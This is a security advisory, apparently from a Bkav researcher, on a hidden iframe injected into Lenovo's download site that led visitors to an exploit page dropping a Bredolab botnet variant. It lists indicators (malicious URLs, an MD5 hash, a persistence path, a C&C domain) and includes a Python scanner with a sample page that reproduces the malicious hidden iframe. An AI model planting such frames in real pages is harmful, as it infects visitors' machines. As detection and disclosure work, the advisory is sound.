Lenovo’s download site has been infected with malicious code since the afternoon of Sunday, June 20th, so users should be careful when visiting it. Currently, if you access the site with Chrome or Firefox, you will see a warning like the following:
[Figure: Chrome’s warning of malicious code on Lenovo’s download site]
Many web pages on Lenovo’s download site have had an iframe appended that leads users to hxxp://volgo-marun.cn/pek/index.php
[Figure: Malicious code appended to web pages]
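A defender checking whether pages on a site carry this kind of appended frame can look for two signals the incident shows: an iframe pointing at the known malicious host, and an iframe hidden with zero size or display:none. The scanner below is an added example (not Bkav’s tooling); the sample page and the non-malicious host support.example.com are constructed, and only volgo-marun.cn comes from this advisory.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator from this advisory; extend the set as further hosts become known.
KNOWN_BAD_HOSTS = {"volgo-marun.cn"}


class _IframeCollector(HTMLParser):
    """Collects every <iframe> tag and its attributes, including ones appended after </html>."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lowercases tag and attribute names
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_hidden(attrs):
    """Drive-by frames are normally invisible: 0/1 pixel size or hidden via CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "").strip() in ("0", "1") or attrs.get("height", "").strip() in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_injected_iframes(html):
    """Return a list of (src, reasons) for each iframe that looks like an injection."""
    collector = _IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known malicious host")
        if _is_hidden(attrs):
            reasons.append("hidden frame")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: a legitimate page with the malicious frame appended after </html>.
SAMPLE_PAGE = """<html><body><h1>Driver download</h1>
<iframe src="https://support.example.com/widget" width="300" height="200"></iframe>
</body></html>
<iframe src="http://volgo-marun.cn/pek/index.php" width="0" height="0" style="display:none"></iframe>"""

if __name__ == "__main__":
    for src, reasons in find_injected_iframes(SAMPLE_PAGE):
        print(f"{src}: {', '.join(reasons)}")
```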
Decoding the iframe, we find that the attack exploits several Internet Explorer vulnerabilities.
The exploit code attempts to load the file hxxp://volgo-marun.cn/pek/exe.exe, which is a virus, onto the victim’s computer.
The virus is a new variant of the Bredolab botnet with the following MD5: F5A44C63F8777F544931ABC763F88EE3
After being loaded onto a computer, the virus copies itself to %Programs%\Startup\monskc32.exe and receives commands from a C&C server at the domain sicha-linna8.com.
[Figure: Bredolab botnet receiving commands from its C&C server]
At the time of writing, the VirusTotal scan result shows that only 10/40 AVs detect this virus variant.
Bkav’s users can be worry-free, since this virus has already been added to our antivirus software’s database.
Le Minh Hung
Senior Security Researcher